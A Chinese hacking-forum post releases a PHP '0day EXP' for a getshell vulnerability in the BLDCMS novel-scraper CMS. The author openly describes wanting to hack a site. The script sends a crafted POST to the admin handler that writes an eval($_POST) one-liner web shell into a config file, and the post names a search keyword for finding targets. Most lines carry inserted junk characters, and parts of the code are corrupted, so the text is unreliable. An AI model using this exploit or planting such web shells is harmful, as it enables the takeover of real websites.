之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
7 o0 g, p* D& D, K! l: Q: B5 G
2 F4 P0 S% O7 Z! e3 q
+ N$ q( Y, U4 n3 b* b话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
0 D* S4 q" K4 ^- o) A( j1 z
8 N; ?/ ^( n3 |' N" r- y既然都有人发了 我就把我之前写好的EXP放出来吧& u0 d6 I# j" X! p( T; y
5 G- g. D6 d3 G/ S3 aview source print?01.php;">8 |4 V4 U, A |$ s- q5 Z3 E
02.<!--?php
# Y# J( [0 ~& ] }. O* I03.echo "-------------------------------------------------------------------
; J0 U( K/ l9 W' F& z& Y+ [04.
: N- p L6 j/ u& c& d4 b* E05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP* S% r8 n& P! m# m+ I% W2 r; S
06.
/ F* x# \) V" \5 d+ @07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
# Z$ h; g; b+ Q& N3 e7 `- ^08.
! C7 p4 u9 F% _% A09.QQ:981009941\r\n 2013.3.21\r\n
n. Q: h; G5 g& ?10. " N. V* |% Y8 A# L) w
11. . N9 [6 q9 R& i% I: \
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码; X' L9 A# W. g ~9 L
13.
( v' p& `6 o' w; O; R14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
6 W2 D) I4 b& ?4 t0 z5 X9 `15. ' O8 g5 n" S! [6 w2 W$ J3 [" W: X7 n
16.--------------------------------------------------------------------\r\n";
4 n3 s3 r) n) J8 S3 X, \17.$url=$argv[1];* i7 o8 C- \. z% C1 [, ?! Q9 A! C
18.$dir=$argv[2];& h6 _1 j; C! s( T5 B
19.$pass=$argv[3];
5 t W, m' i1 ]. d8 }4 _6 i20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\''; K) F9 i+ ^: }( k3 n6 R# | @3 W
21.if (emptyempty($pass)||emptyempty($url))' r+ O/ k) F! E- V0 z
22.{exit("请输入参数");}$ K$ o7 Y% }9 B
23.else c9 h( A4 I; E
24.{
) v' e& ]* `% L/ L1 f& Z25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
- L7 ]1 s6 ~' v" ?. Y d$ {3 Y0 R26.
. E5 y- U, J; t a4 h27.al;& F5 E1 Q- U, J( S
28.$length = strlen($fuckdata);( l |+ [* {3 O
29.function getshell($url,$pass)
7 ]) A; X; K9 k3 L1 J% m5 x" @30.{3 u# u5 a2 e) `/ O- N& U5 U
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" B: y( Y9 j1 _6 Q& o( F' X32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
# g3 n# f, w* [, J3 }- {" t33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";2 X* m" j4 ]# w1 `6 w4 A
34.$header .= "User-Agent: MSIE\r\n";
+ w5 n3 \/ R4 V5 g35.$header .= "Host:".$url."\r\n";
5 ~& `' y& k& C, Q36.$header .= "Content-Length: ".$length."\r\n";
! c/ t" Y5 I8 X' U$ b9 t* d37.$header .= "Connection: Close\r\n";
7 r+ K6 A' M7 C38.$header .="\r\n";
$ I$ |; _# D. Q39.$header .= $fuckdata."\r\n\r\n";
, k2 i4 N1 [, j) c/ P40.$fp = fsockopen($url, 80,$errno,$errstr,15);
" D1 m* T7 T0 ^, n7 r41.if (!$fp)
+ i+ c4 t" _& S$ t! N; N+ g j4 w42.{
c8 `+ r# u8 P( b9 E4 J8 d( M43.exit ("利用失败:请检查指定目标是否能正常打开");
$ O+ `" r7 A3 L44.}( W) P4 D" t/ m: r# ^/ T2 G
45.else{ if (!fputs($fp,$header))2 N: a5 {- }1 E+ z
46.{exit ("利用失败");}
; o$ E7 i, m) l47.else
+ C$ S7 w3 y7 H' Q48.{3 s1 E I3 C1 d: u# G! }1 z
49.$receive = '';
% ]) g0 y1 R( K2 k50.while (!feof($fp)) {
/ X+ A: Q/ \3 y# F5 c F; y0 f51.$receive .= @fgets($fp, 1000);$ S0 D; m& B ~- X) [7 d
52.}
) y# f" q" H: g! R" ^& q; y! ~7 l53.@fclose($fp);
, W- x a E- K! S7 A54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
/ r. g6 p1 e( f& c( ~* P55. ( x6 Z: N: m5 f1 p
56.GPC是否=off)";1 V5 H3 R1 h; q8 Z
57.}}
1 c5 V4 P1 J3 G: G5 [58.}
6 ?. w- i" I* R7 I- u4 s. G6 L5 y59.}
9 m" c8 P6 }' {4 f4 t: M- S% o60.getshell($url,$pass);7 S L2 \0 j# U8 B* c) ]0 P
61.?-->, h- E6 x: B! j5 {
7 q: C; G% B i+ U$ n3 ]
1 d& E5 l+ B: X( i1 o; ?$ _6 C! Z + F, @9 U' X2 u, d& c) N
by 数据流+ ]/ d% |( Y9 ~; k \: V
|
发表于 2013-3-26 20:49:10
收藏
支持
反对